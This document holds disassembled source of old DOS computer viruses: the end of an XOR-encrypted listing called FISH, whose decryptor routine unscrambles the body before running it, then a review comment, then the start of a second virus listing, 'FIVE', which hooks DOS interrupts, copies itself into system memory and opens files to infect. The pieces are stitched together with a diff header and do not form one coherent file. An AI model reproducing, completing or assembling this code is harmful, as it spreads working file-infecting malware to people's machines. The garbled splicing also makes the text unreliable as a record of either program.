DB 40H, 58H, 5EH, 46H, 54H, 57H
DB 12H, 84H,0DBH, 03H, 0AH,0B4H
DB 28H, 0DH,0B2H,0B8H, 03H,0FEH
DB 0A9H,0B2H,0B8H, 03H, 03H, 12H
DB 86H, 58H, 1FH, 86H, 48H, 1DH
DB 08H, 02H, 03H, 8EH,0DFH, 0DH
DB 28H,0FDH,0F2H, 84H, 58H, 1FH
DB 84H, 48H, 1DH, 20H,0F1H, 00H
DB 8EH,0D7H, 0DH, 84H, 58H, 2EH
DB 84H, 48H, 2CH,0B4H, 11H, 0DH
DB 0CAH, 48H, 03H, 0CH, 0DH,0B9H
DB 2AH, 84H,0F7H,0E5H,0DEH,0F6H
DB 0E4H, 3DH,0F2H, 03H, 0AH,0B2H
DB 0B8H, 03H,0B4H, 28H, 0DH, 84H
DB 0DBH,0FEH,0A9H, 13H, 5FH, 03H
DB 12H,0B9H, 02H,0B7H,0B8H, 03H
DB 0E5H,0B5H,0F6H,0B9H, 1DH,0E5H
DB 0BEH,0F6H,0FBH, 0BH,0C7H, 03H
DB 8DH, 53H, 12H, 79H, 26H, 23H
DB 0C9H, 13H,0C8H, 03H, 81H,0CDH
DB 8CH,0E6H, 0DH, 03H, 10H, 0DH
DB 0DH, 3EH,0DFH, 23H, 86H, 03H
DB 0CEH, 03H, 44H, 0CH,0C6H, 18H
DB 0DH, 0DH, 4CH,0FAH,0FCH, 84H
DB 49H, 2EH, 9FH, 9EH,0FAH,0FCH
DB 84H, 49H, 2CH,0E4H,0D2H,0F3H
DB 0E4H, 74H,0F3H,0E5H, 61H, 09H
DB 0E5H, 18H, 09H, 7FH, 34H, 23H
DB 8DH, 33H,0AFH, 03H, 0DH, 79H
DB 3CH,0E5H, 64H, 09H, 8EH,0F6H
DB 0F2H, 79H, 24H, 23H,0F3H, 03H
DB 0AFH, 03H, 03H, 0AH,0B4H, 19H
DB 0DH,0B2H, 5FH, 03H, 3EH,0CDH
DB 0FFH,0A2H, 23H,0ACH,0AEH, 03H
DB 2BH, 84H, 48H,0F3H, 2BH, 84H
DB 50H, 2BH, 84H, 53H,0F1H, 23H
DB 8DH, 2BH,0BEH, 03H,0F3H,0E4H
DB 96H,0F3H,0E4H, 38H,0F3H, 03H
DB 0AH,0E5H, 2BH, 09H,0B4H, 19H
DB 0DH, 23H,0ACH,0AEH, 03H,0B2H
DB 5FH, 03H,0FFH
DB 0A2H, 'x', 1BH, '+6P+x'
DB 0FBH, 2BH,0CAH, 48H,0F3H, 0DH
DB 0DH,0E5H, 1AH, 0FH, 23H,0F3H
DB 0BH,0AFH, 03H,0E6H,0C6H,0E4H
DB 04H,0F3H,0B9H, 22H, 0BH,0E5H
DB 0BH,0F6H, 0BH, 12H, 0AH,0CEH
DB 07H,0CDH, 79H, 0EH,0E4H, 5BH
DB 0CH, 13H, 5FH, 23H, 81H, 0BH
DB 2BH, 03H, 23H, 84H, 13H, 29H
DB 03H, 23H,0C8H, 3BH, 29H, 03H
DB 0B4H, 03H, 0DH,0B2H,0FCH, 03H
DB 03H, 0AH,0FEH,0A9H, 53H, 12H
DB 0B4H, 5DH, 0DH,0B2H, 0AH, 02H
DB 0FEH,0A9H,0B6H,0F2H,0F2H,0E5H
DB 0E3H,0F7H, 50H, 23H, 82H, 0BH
DB 0EBH, 03H, 23H, 82H, 0BH,0E5H
DB 03H, 23H, 82H, 0BH,0BEH, 03H
DB 03H,0B5H, 0CH, 46H, 0AH, 91H
DB 0B6H,0FCH, 03H, 23H,0F2H, 13H
DB 38H, 03H, 7EH, 2DH, 23H, 8EH
DB 03H,0BEH, 03H, 0CH, 23H,0F2H
DB 3BH,0BEH, 03H, 23H,0F2H, 3BH
DB 0E5H, 03H, 23H,0F2H, 3BH,0EBH
DB 03H, 58H, 23H,0C9H, 13H, 29H
DB 03H, 84H,0E8H,0E4H, 9CH,0F0H
DB 0E5H, 8DH, 0EH, 03H, 0AH,0B4H
DB 19H, 0DH,0B2H, 5FH, 03H, 23H
DB 0ACH,0AEH, 03H,0FFH,0A2H, 78H
DB 00H, 2BH,0CAH, 48H,0F3H, 0DH
DB 0DH, 23H,0F3H, 0BH,0AFH, 03H
DB 0E6H,0E6H, 23H,0C8H, 3BH, 0EH
DB 02H, 8EH,0F3H, 0CH, 78H, 39H
DB 86H, 1BH, 17H, 0DH, 8EH,0CFH
DB 1DH,0B9H, 5CH,0E5H, 57H,0F7H
DB 0EH,0DEH, 23H, 84H, 1BH, 08H
DB 02H,0F2H, 3BH, 15H, 0DH, 23H
DB 82H, 0BH, 0EH, 02H, 0EH, 13H
DB 1FH, 0DH, 8EH,0CEH, 1DH, 23H
DB 84H, 13H, 0CH, 02H,0F2H, 3BH
DB 19H, 0DH, 23H, 82H, 0BH,0F2H
DB 03H,0E4H, 25H, 0DH, 86H, 09H
DB 0EH, 49H, 0FH, 5EH, 86H, 51H
DB 09H,0FAH,0DEH, 0CH,0D5H, 56H
DB 79H, 6CH, 03H, 12H,0B7H, 0AH
DB 02H,0E5H,0B4H, 0FH,0E5H, 1AH
DB 0EH, 23H,0F3H, 0BH,0E2H, 03H
DB 0E5H, 1DH, 0CH, 23H,0F3H, 03H
DB 0E2H, 03H,0B9H, 5CH,0E5H, 08H
DB 0F7H,0E5H, 50H,0F7H,0E5H, 8DH
DB 0F7H,0E5H, 3FH,0F7H, 83H,0D6H
DB 83H,0CEH, 23H,0F2H, 3BH,0BEH
DB 03H, 23H,0F2H, 3BH,0E5H, 03H
DB 23H,0F2H, 3BH,0EBH, 03H, 82H
DB 0BH, 07H, 0DH, 82H, 0BH, 01H
DB 0DH, 13H,0BDH, 2FH,0C8H, 1BH
DB 07H, 0DH,0E5H, 8DH,0F7H, 12H
DB 90H, 55H, 23H, 86H, 2BH,0F2H
DB 03H, 23H, 83H, 1BH, 0CH, 02H
DB 23H,0F2H, 23H, 0EH, 02H
DB '^BAH', 86H, 'Q', 0CH, 86H, 8DH, '4'
DB 0FFH, 84H, 09H, 86H, 8DH, 36H
DB 0FFH, 84H, 49H, 0FH, 86H, 8DH
DB 30H,0FFH, 84H, 49H, 09H,0E5H
DB 0DAH, 0EH,0E6H, 96H, 31H, 0CH
DB 79H, 0EH,0E4H, 96H,0F1H, 23H
DB 8EH, 03H,0BEH, 03H, 0CH, 23H
DB 81H, 0BH, 2BH, 03H, 23H, 84H
DB 13H, 29H, 03H,0E5H,0A4H,0F4H
DB 0E5H, 85H,0F4H,0E5H, 9DH,0F4H
DB 23H,0C9H, 13H, 29H, 03H, 2BH
DB 0C8H, 7AH, 1FH, 7FH, 79H, 23H
DB 8DH, 2BH,0BEH, 03H,0F3H, 8EH
DB 0F3H, 0CH, 79H, 24H, 86H, 09H
DB 0EH, 49H, 0FH, 5EH, 86H, 51H
DB 09H,0FAH,0DEH, 0CH,0D5H
DB 'VxH', 86H, 'Q', 0CH, 86H, 8DH, '4'
DB 0FFH, 84H, 09H, 86H, 8DH, 36H
DB 0FFH, 84H, 49H, 0FH, 86H, 8DH
DB 30H,0FFH, 84H, 49H, 09H,0E6H
DB 21H, 86H, 1BH, 17H, 0DH,0E5H
DB 3FH, 0FH, 23H, 86H, 03H,0AEH
DB 03H, 8EH,0CCH, 1DH, 0CH,0C7H
DB 2BH, 84H, 5AH, 19H,0ACH, 15H
DB 0DH, 2BH, 84H, 4AH, 1FH,0ACH
DB 1FH, 0DH, 0EH,0CCH, 2BH, 84H
DB 4AH, 1DH,0ACH, 19H, 0DH, 2BH
DB 84H, 4AH, 03H,0E5H, 07H, 0FH
DB 23H, 83H, 13H,0AEH, 03H, 86H
DB 4BH, 0FH,0AEH, 07H, 0DH, 86H
DB 4BH, 09H,0AEH, 01H, 0DH,0E4H
DB 6EH,0F1H, 4BH, 44H, 5EH, 45H
DB 0E5H,0A6H, 09H,0E5H,0D1H, 0DH
DB 0CBH, 0BH, 2DH, 0DH, 0CH, 8CH
DB 33H, 0DH, 03H, 40H, 57H, 79H
DB 03H, 8CH, 33H, 0DH, 03H, 57H
DB 40H, 79H, 0BH,0F3H, 03H, 2DH
DB 0DH, 79H, 55H,0ACH, 09H, 03H
DB 0DCH,0ECH,0FAH,0ECH, 08H, 0DH
DB 0FH, 34H,0FDH, 7FH, 45H,0ACH
DB 07H, 03H, 06H, 0BH, 01H, 03H
DB 79H, 32H, 86H, 1BH,0A6H, 03H
DB 0B4H, 0DH, 0FH,0ACH,0A4H, 03H
DB 0FAH,0FCH, 06H,0DFH, 79H, 0CH
DB 4DH, 84H, 1BH, 0FH, 03H,0AEH
DB 09H, 03H, 8EH, 33H, 19H, 03H
DB 0CH, 79H, 60H,0CAH, 0BH, 19H
DB 03H, 0CH, 0DH, 86H,0CBH, 26H
DB 0BH, 05H, 03H,0AEH, 1BH, 03H
DB 8EH, 0BH, 09H, 03H, 0AH,0CAH
DB 0BH, 1DH, 03H, 0DH, 03H,0AEH
DB 03H, 03H,0E5H,0C0H, 0DH,0E6H
DB 46H, 8CH,0F3H, 0DH, 02H, 7EH
DB 48H,0ACH, 0DH, 03H,0AEH, 09H
DB 0DH, 0CH,0CFH,0ACH, 0FH, 03H
DB 0AEH, 0BH, 0DH, 0CH,0CFH,0ACH
DB 09H, 03H,0AEH, 05H, 0DH,0FAH
DB 0DDH, 0CH,0CFH, 79H, 24H,0ACH
DB 0FFH, 03H, 29H, 09H, 78H, 2FH
DB 0BCH,0E4H,0B5H, 1DH, 0DH, 85H
DB 03H, 0DH, 03H,0FAH,0EBH, 08H
DB 0C6H, 00H,0AEH, 0CH, 03H,0ACH
DB 0DH, 03H, 0EH, 0BH, 0FH, 03H
DB 0FAH,0D5H,0FAH,0DDH,0AEH, 09H
DB 03H,0E5H, 8DH, 0DH,0B9H, 33H
DB 0E5H, 3BH,0F5H, 23H, 86H, 03H
DB 0FFH, 03H,0B5H, 0CH, 4EH, 23H
DB 86H, 1BH,0F9H, 03H, 23H, 83H
DB 13H,0FBH, 03H,0E5H, 2CH,0F5H
DB 0E5H, 40H, 09H,0CEH, 03H,0B5H
DB 0DH, 5AH, 12H,0E5H, 18H,0F5H
DB 84H, 03H, 24H, 03H,0B5H, 0DH
DB 4FH, 84H, 1BH, 26H, 03H, 3EH
DB 0C4H, 3EH,0DFH,0E5H, 0EH,0F5H
DB 0B9H, 32H,0B7H, 0DH, 03H,0BCH
DB 11H,0E5H,0F4H,0FAH, 3EH,0C4H
DB 0B5H, 0DH, 4FH, 3EH,0DFH,0E5H
DB 0E2H,0FAH,0BCH, 11H,0B9H, 32H
DB 0B7H, 09H, 0DH,0E5H,0E8H,0FAH
DB 3EH,0C4H,0B5H, 0FH, 4FH, 86H
DB 0DCH,0E5H,0D6H,0FAH, 84H, 1BH
DB 0A6H, 03H,0AEH,0A4H, 03H, 86H
DB 0F5H, 08H, 02H, 0DH, 8EH,0DFH
DB 0DH, 28H,0FDH,0F2H, 24H,0CAH
DB 0B4H, 1DH, 0DH,0FAH,0FCH, 86H
DB 0FDH,0CEH, 5DH, 44H, 46H, 48H
DB 3EH,0C4H,0B5H, 0DH, 4FH, 86H
DB 0DCH,0E5H,0BCH,0FAH,0BCH, 11H
DB 0B9H, 4DH,0B7H, 0DH, 03H,0E5H
DB 0AAH,0FAH,0B5H, 1DH, 0DH,0FAH
DB 0EBH, 86H,0C7H, 86H,0DDH,0B5H
DB 0DH, 4FH,0E5H, 95H,0FAH,0B4H
DB 0DH, 03H, 3EH,0DFH, 0CH,0F4H
DB 0B9H, 4DH, 23H,0CBH, 0BH, 3EH
DB 03H, 0CH, 5EH,0E5H,0D0H, 09H
DB 56H, 86H, 03H, 24H, 03H,0B5H
DB 0CH, 5AH, 86H, 1BH, 26H, 03H
DB 0FBH,0CBH, 8DH, 78H, 0EH, 8DH
DB 0CBH,0C5H,0E5H, 63H,0FAH,0CEH
DB 0E5H,0C8H,0FAH, 84H,0DAH, 8EH
DB 0CAH, 00H, 13H, 0AH,0E6H, 2DH
DB 0E5H,0B4H,0FAH, 13H, 0AH,0B4H
DB 5DH, 0DH, 84H,0DAH,0BEH, 0DH
DB 3EH,0CDH, 8DH, 70H, 0CH, 37H
DB 78H, 08H, 87H, 10H, 8DH,0EEH
DB 12H, 23H, 85H, 13H, 25H, 03H
DB 0FFH,0A3H, 86H, 48H,0F0H, 28H
DB 0D2H,0D2H, 0FH,0EDH, 87H, 48H
DB 0F1H, 29H,0D2H, 0FH,0C9H, 23H
DB 0CBH, 0BH, 2DH, 0DH, 0DH, 31H
DB 0D2H, 79H, 04H, 23H,0F3H, 0BH
DB 2DH, 0DH, 31H,0EFH, 78H, 00H
DB 0E5H, 5FH,0FAH,0F5H,0CEH
DB '@LNFH_HA'
DB 0E5H, 48H,0FAH,0F4H,0CEH, 5EH
DB 0B9H, 5CH,0E5H, 0AH,0FAH, 23H
DB 84H, 13H,0AEH, 03H, 56H,0CEH
DB 0E5H,0A1H, 0FH, 5FH,0B9H, 3BH
DB 23H, 87H, 1BH, 25H, 03H,0E5H
DB 0FFH,0FBH,0FAH,0ECH,0FAH,0EEH
DB 84H,0DEH, 57H, 06H,0D6H, 78H
DB 08H, 30H, 0DH, 4DH, 7FH, 45H
DB 0B5H, 0DH, 4EH,0E5H,0D1H,0FBH
DB 7FH, 4DH, 23H, 84H, 1BH,0F9H
DB 03H, 23H, 84H, 03H,0FFH, 03H
DB 23H, 81H, 13H,0FBH, 03H,0B5H
DB 0CH, 4EH, 3EH,0C4H,0E5H,0CEH
DB 0FBH, 23H, 8DH, 33H,0D7H, 03H
DB 0DH, 78H, 2CH,0B5H, 0FH, 30H
DB 0E5H,0B8H,0FBH, 7FH, 14H, 86H
DB 0D5H, 5EH,0B9H, 3FH, 23H, 87H
DB 1BH, 25H, 03H,0E5H,0ABH,0FBH
DB 86H, 4AH, 13H, 23H,0AEH,0E1H
DB 03H, 56H,0E5H,0C7H, 0FH,0CEH
DB 3EH,0D6H, 46H,0E5H,0CEH, 0FH
DB 0CEH, 5CH, 5FH, 5DH,0B5H, 0DH
DB 49H,0E5H, 87H,0FBH, 8DH,0FFH
DB 8DH,0FBH,0CFH, 8DH, 79H, 04H
DB 0B5H, 0DH, 5AH,0E5H, 71H,0FBH
DB 0FBH,0CBH, 8DH, 55H, 57H, 54H
DB 0CEH,0E5H,0C0H,0FBH, 3EH,0C4H
DB 0B5H, 0CH, 4FH, 3EH,0DFH,0E5H
DB 65H,0FBH, 23H, 84H, 1BH,0AAH
DB 03H, 23H,0AEH,0A8H, 03H,0B5H
DB 0FH, 4FH, 3EH,0C4H, 3EH,0DFH
DB 0E5H, 58H,0FBH, 23H, 84H, 1BH
DB 0A6H, 03H, 23H,0AEH,0A4H, 03H
DB 0B5H, 0DH, 4FH, 23H, 86H, 1BH
DB 0A8H, 03H, 23H, 86H, 03H,0AAH
DB 03H,0E5H, 31H,0FBH,0E5H, 62H
DB 0FBH,0CEH, 4BH, 44H, 5EH, 45H
DB 07H,0CDH, 78H, 2FH, 23H, 8EH
DB 2BH,0BEH, 03H,0F3H,0E5H, 48H
DB 0FBH,0E5H, 29H,0FBH, 7FH, 06H
DB 0FBH,0CBH, 8DH, 79H, 0EH, 8DH
DB 0E3H,0C5H,0E4H, 15H,0F4H, 23H
DB 8EH, 03H,0BEH, 03H, 0CH,0E4H
DB 02H,0F4H, 31H, 0CH, 78H, 3AH
DB 23H, 8EH, 2BH,0BEH, 03H,0F3H
DB 0FBH,0CBH, 8DH, 79H, 0EH, 8DH
DB 0E3H,0C5H,0E5H, 6BH,0F2H, 79H
DB 0EH, 8DH,0CBH,0C5H,0E5H,0FCH
DB 0F8H, 84H, 4BH,0F1H, 23H, 8EH
DB 1BH,0BEH, 03H, 0DH,0E4H, 48H
DB 0F4H, 31H, 0FH, 78H, 03H,0E5H
DB 46H,0F2H, 79H, 04H, 8CH, 63H
DB 0FBH, 0DH, 03H, 8EH, 53H,0F5H
DB 0DH,0E4H,0C0H,0F5H,0E5H,0D5H
DB 0F8H,0B9H, 27H,0E5H,0C5H,0F8H
DB 8CH,0F4H,0CAH, 0AH, 7FH, 06H
DB 0B9H, 04H, 03H, 12H,0B7H,0A6H
DB 0CH,0E5H,0B5H,0F8H,0F9H,0E5H
DB 0DFH,0F8H,0CEH, 23H, 8DH, 2BH
DB 0BEH, 03H,0F3H,0E5H, 1AH,0F2H
DB 79H,0D8H, 23H, 84H, 1BH,0A0H
DB 03H, 23H, 84H, 03H,0A2H, 03H
DB 23H,0CAH, 0BH,0BCH, 03H, 0DH
DB 0DH,0E5H, 12H,0F2H, 23H,0ACH
DB 0A4H, 03H, 23H, 86H, 1BH,0A6H
DB 03H, 20H, 0DH, 03H, 8EH,0D7H
DB 0DH, 23H, 26H, 0BH,0A8H, 03H
DB 23H, 16H, 1BH,0AAH, 03H, 74H
DB 05H,0CAH, 4BH,0F1H, 0DH, 0DH
DB 0E4H, 20H,0F7H, 78H, 05H, 36H
DB 0CCH, 7AH, 09H, 23H,0AEH,0A2H
DB 03H, 23H, 86H, 03H,0AAH, 03H
DB 23H, 86H, 1BH,0A8H, 03H, 06H
DB 0C4H, 78H, 08H, 8EH,0F7H, 11H
DB 7BH, 17H, 23H, 86H, 1BH,0A0H
DB 03H,0B9H, 32H, 23H, 86H, 03H
DB 0A2H, 03H,0E5H, 48H,0F8H, 23H
DB 0EH, 0BH,0BCH, 03H, 84H, 4BH
DB 0F1H,0E4H, 97H,0F5H, 84H,0DAH
DB 84H,0DBH, 23H, 0EH, 33H,0A2H
DB 03H, 8EH,0F2H, 11H, 7FH, 05H
DB 3EH,0F2H,0E6H, 04H, 59H, 58H
DB 43H, 4CH, 8EH,0E2H, 11H,0FAH
DB 0D2H, 86H,0CFH, 23H, 86H, 1BH
DB 0A4H, 03H, 23H, 86H, 03H,0A6H
DB 03H, 8EH,0CFH, 02H, 8EH,0DCH
DB 0DH, 8EH,0EFH,0FDH, 8CH,0E7H
DB 0F1H, 00H, 8EH,0D4H, 0DH, 0CH
DB 0CFH, 8EH,0DCH, 0DH,0B5H, 0DH
DB 4FH,0E5H,0F5H,0F9H,0B4H, 11H
DB 0DH, 24H,0F4H, 24H,0FCH,0B9H
DB 32H, 23H, 86H, 1BH,0A0H, 03H
DB 0E5H,0EAH,0F9H, 23H, 0CH, 0BH
DB 0A0H, 03H, 23H, 24H, 0BH,0A2H
DB 03H, 23H, 0CH, 0BH,0BCH, 03H
DB 3EH,0C4H,0B5H, 0DH, 4FH,0B7H
DB 11H, 0DH,0E5H,0C0H,0F9H,0E4H
DB 7BH,0F2H, 23H, 2CH, 2BH, 3CH
DB 03H,0E4H, 35H, 0CH, 23H, 8EH
DB 2BH,0BEH, 03H,0F3H,0E5H,0DAH
DB 0F9H,0E5H,0BBH,0F9H,0E5H,0B3H
DB 0F9H, 7EH, 04H, 23H, 8EH, 03H
DB 0BEH, 03H, 0CH,0E4H, 05H,0F5H
DB 0E5H, 94H,0F4H,0FBH, 4AH, 14H
DB 8DH, 78H, 0EH,0E4H,0F1H,0FAH
DB 8CH, 62H, 17H, 0DH, 03H, 8EH
DB 52H, 11H
DB 0DH, 8DH, 62H
LOC_3:
ADC AL,0C5H
IN AL,0E1H ; port 0E1H, Memory encode reg1
CLI ; Disable interrupts
OUT 83H,AL ; port 83H, DMA page reg ch 1
OR CX,[BX+SI+3]
OR DX,[BP+SI]
DB 0F3H, 03H, 0EH, 0DH, 81H,0D7H
DB 47H, 83H,0D7H,0ACH, 0EH, 0DH
DB 0F3H,0C1H, 0CH,0CFH,0AEH, 0EH
DB 0DH, 52H, 4FH, 83H,0CFH, 03H
DB 12H,0E5H,0D2H, 0DH,0ACH,0B3H
DB 0F3H, 02H,0B4H, 0DH, 05H, 84H
DB 0FAH,0F0H,0FEH,0A8H,0F1H, 0BH
DB 0B5H,0D0H, 0CH, 5DH, 23H, 83H
DB 0BH, 48H, 03H,0C6H, 23H,0CBH
DB 0BH,0D7H, 03H, 0DH,0E5H,0AEH
DB 0F9H, 03H,0E5H, 77H,0F2H, 85H
DB 0BDH, 1EH, 12H,0E5H,0F1H,0F9H
DB 81H, 0BH, 22H, 03H, 84H, 13H
DB 20H, 03H, 81H, 0BH, 36H, 03H
DB 0BFH, 0FH, 84H, 13H, 34H, 03H
DB 85H, 1BH, 5DH, 03H,0E5H,0CFH
DB 0F9H, 84H, 2BH,0D2H, 03H, 81H
DB 1BH,0D0H, 03H, 03H,0B5H, 24H
DB 01H, 5DH,0B5H, 7DH, 0DH,0B4H
DB 0F2H,0F2H, 83H,0CDH, 3EH,0F2H
DB 0BDH,0C6H,0FFH,0A3H, 42H, 91H
DB 0BH, 5AH, 91H, 55H, 8DH,0C1H
DB 0CH, 5DH, 90H, 3EH,0CDH,0F2H
DB 23H, 20H, 03H, 03H, 12H,0E5H
DB 64H, 0DH, 81H,0BDH, 1EH,0B7H
DB 9DH, 00H,0E5H, 9EH,0F9H,0BDH
DB 29H,0E5H,0A9H,0F9H, 84H, 13H
DB 30H, 03H,0B7H,0C8H, 00H,0BDH
DB 29H, 81H, 0BH, 32H, 03H,0E5H
DB 73H,0F9H,0E5H, 05H,0F9H,0CEH
DB 0E5H, 24H,0F9H, 23H,0C8H, 1BH
DB 34H, 03H,0BDH, 1EH,0E5H, 60H
DB 0F9H, 23H,0C8H, 1BH, 30H, 03H
DB 0BDH, 29H,0E5H, 6EH,0F9H,0E5H
DB 0E0H,0FEH,0CEH, 58H, 84H,0E8H
DB 8CH, 6BH, 0BH,0F2H,0F3H,0F2H
DB 4BH, 17H, 50H,0C2H, 23H,0CAH
DB 0BH, 5DH, 03H, 0CH, 09H,0E5H
DB 30H,0F9H,0E5H,0B7H,0FEH, 5DH
DB 23H,0ACH,0BEH, 03H, 00H, 0DH
DB 0CH, 5DH, 90H, 55H, 50H, 23H
DB 0F2H, 23H, 38H, 03H, 84H,0E5H
DB 9FH,0FEH,0BDH, 0CH,0B7H, 66H
DB 01H, 03H, 12H,0E5H, 2BH,0F9H
DB 91H, 55H, 00H, 0DH, 0CH, 5DH
DB 90H, 4DH,0FAH,0EDH, 3AH,0AEH
DB 3CH, 03H,0E5H, 87H,0FEH,0CEH
DB 0F2H, 58H, 84H,0E8H, 5DH, 8CH
DB 73H, 09H, 0DH,0CDH, 7EH, 01H
DB 23H,0ACH, 4AH, 03H, 34H, 4BH
DB 09H, 7BH, 0EH, 55H, 50H,0C2H
DB 23H, 8DH, 33H, 5DH, 03H, 0CH
DB 79H, 2BH, 86H, 4BH, 09H, 23H
DB 0AEH, 22H, 03H, 86H, 4BH, 0FH
DB 23H,0AEH, 20H, 03H, 7FH, 02H
DB 55H, 50H, 23H, 86H, 2BH,0D2H
DB 03H, 23H, 83H, 1BH,0D0H, 03H
DB 0E4H, 39H,0F2H, 8CH, 6BH, 0BH
DB 0F2H,0F3H,0E6H,0C2H, 23H,0F3H
DB 03H, 5CH, 03H, 78H,0C5H, 8CH
DB 6BH, 0BH,0F2H,0F3H,0E5H, 7CH
DB 0FEH,0E5H, 13H,0FEH,0B9H, 21H
DB 0E5H, 03H,0FEH, 23H, 85H, 1BH
DB 5CH, 00H, 23H, 85H, 1BH, 63H
DB 00H, 8DH,0E1H, 0FH,0E5H,0F3H
DB 0FFH, 0FH,0FFH
DATA_4 DD 893B8523H
DB 00H, 23H, 85H, 3BH,0D1H, 00H
DB 0BDH, 0EH,0E5H,0A1H,0FEH, 0BH
DB 12H, 84H,0D7H,0BDH, 0CH,0E5H
DB 80H,0FEH,0E5H,0F2H,0FFH,0E5H
DB 52H,0FEH,0E5H, 1CH,0FEH, 5EH
DB 5CH,0B6H, 25H, 0DH,0B4H, 8AH
DB 0FH, 23H, 8DH, 3AH, 10H, 8EH
DB 0CEH, 08H,0EFH,0FAH, 54H, 56H
DB 0E6H, 97H, 23H, 8DH, 03H, 25H
DB 0DH, 0DH, 79H, 1EH, 5EH, 5CH
DB 0B6H, 25H, 0DH,0B4H, 8AH, 0FH
DB 23H, 8DH, 3AH, 10H, 8EH,0CEH
DB 08H,0EFH,0FAH, 54H, 56H,0E4H
DB 0FEH,0F9H, 5CH, 5EH,0B6H, 25H
DB 0DH,0B4H, 55H, 0DH, 2EH, 80H
DB 37H, 0DH, 43H,0E2H,0F9H, 5BH
DB 59H,0E8H, 94H,0F2H,0EBH, 3FH
DB 0B8H, 2EH, 8FH, 06H, 41H, 0EH
DB 2EH, 8FH, 06H, 43H, 0EH, 2EH
DB 8FH, 06H,0DBH, 0EH, 2EH, 83H
DB 26H,0DBH, 0EH,0FEH, 2EH, 80H
DB 3EH,0DAH, 0EH, 00H, 75H, 11H
DB 2EH,0FFH, 36H,0DBH, 0EH, 2EH
DB 0FFH, 1EH, 2DH, 0EH, 73H, 06H
DB 2EH,0FEH, 06H,0DAH, 0EH,0F9H
DB 2EH,0FFH, 2EH, 41H, 0EH, 89H
DB 32H,0C0H, 2EH,0C6H, 06H,0DAH
DB 0EH, 01H,0CFH
LOC_4:
CALL SUB_1 ; (0EE1)
FISH ENDP
;==========================================================================
; SUBROUTINE
;==========================================================================
SUB_1 PROC NEAR
POP BX
SUB BX,0DA9H
MOV CX,0D58H
LOCLOOP_5:
XOR BYTE PTR CS:[BX],0DH
INC BX
LOOP LOCLOOP_5 ; Loop if cx > 0
DEC BYTE PTR CS:DATA_1E[BX] ; (97E0:00B3=0)
JZ LOC_RET_6 ; Jump if zero
JMP LOC_2 ; (035A)
LOC_RET_6:
RETN
SUB_1 ENDP
AND [BP+49H],AL
PUSH BX
DEC AX
AND [BP],AL
SEG_A ENDS
END START
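Review bot: The listing between START and LOC_4 is shown as instructions and DB rows with no remark that it is still encoded, so the mnemonics there (`RETF 0CD0DH`, `IN AX,0DEH`, the `POP SP` run after LOC_1) should not be read as program logic. SUB_1 at the end of the file takes its return address, subtracts 0DA9h, and XORs 0D58h bytes with 0Dh before it jumps to LOC_2, which is why the quoted strings in the DB rows look scrambled. I would add a header comment such as `; NOTE: body is byte-XORed with 0Dh until SUB_1 runs; disassembly above LOC_4 is of encoded bytes`, so an analyst decodes the region before annotating it or deriving signatures from it. The last few DB rows directly before LOC_4 appear to fall outside the decoded range and may be plain code; that is inferred from the loop bounds and the address comments, not confirmed.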
+285
@@ -0,0 +1,285 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ FIVE ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 18-Jan-91 ÛÛ
;ÛÛ Version: ÛÛ
;ÛÛ Passes: 5 Analysis Options on: H ÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 200h ; (0000:0200=0)
data_2e equ 4 ; (7415:0004=0)
data_6e equ 0FE07h ; (7415:FE07=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
five proc far
start:
mov si,4
mov ds,si
lds dx,dword ptr [si+8] ; Load 32 bit ptr
mov ah,13h
int 2Fh ; Multiplex/Spooler al=func 00h
; get installed status
push ds
push dx
int 2Fh ; Multiplex/Spooler al=func 00h
; get installed status
pop ax
mov di,0F8h
stosw ; Store ax to es:[di]
pop ax
stosw ; Store ax to es:[di]
mov ds,si
lds ax,dword ptr [si+40h] ; Load 32 bit ptr
cmp ax,117h
stosw ; Store ax to es:[di]
mov ax,ds
stosw ; Store ax to es:[di]
push es
push di
jnz loc_1 ; Jump if not zero
shl si,1 ; Shift w/zeros fill
mov cx,1FFh
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jz loc_2 ; Jump if zero
loc_1:
mov ah,52h ; 'R'
int 21h ; DOS Services ah=function 52h
; get DOS data table ptr es:bx
push es
mov si,0F8h
les di,dword ptr es:[bx+12h] ; Load 32 bit ptr
mov dx,es:[di+2]
mov cx,207h
rep movs byte ptr es:[di],ss:[si] ; Rep when cx >0 Mov [si] to es:[di]
mov ds,cx
mov di,16h
mov word ptr [di+6Eh],117h
mov [di+70h],es
pop ds
mov [bx+14h],dx
mov dx,cs
mov ds,dx
mov bx,[di-14h]
dec bh
mov es,bx
cmp dx,[di]
mov ds,[di]
mov dx,[di]
dec dx
mov ds,dx
mov si,cx
mov dx,di
mov cl,28h ; '('
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
mov ds,bx
jc loc_4 ; Jump if carry Set
loc_2:
mov si,cx
mov ds,ss:[si+2Ch]
loc_3:
lodsw ; String [si] to ax
dec si
or ax,ax ; Zero ?
jnz loc_3 ; Jump if not zero
lea dx,[si+3] ; Load effective addr
loc_4:
mov ax,3D00h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
xchg ax,bx
pop dx
push dx
push cs
pop ds
push ds
pop es
mov cl,2
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov dl,cl
xchg cl,ch
mov al,byte ptr ds:[100h] ; (7415:0100=0BEh)
cmp al,data_5 ; (7415:02FF=2Ah)
jne loc_5 ; Jump if not equal
mov ah,3Fh ; '?'
loc_5:
jmp $-157h
five endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
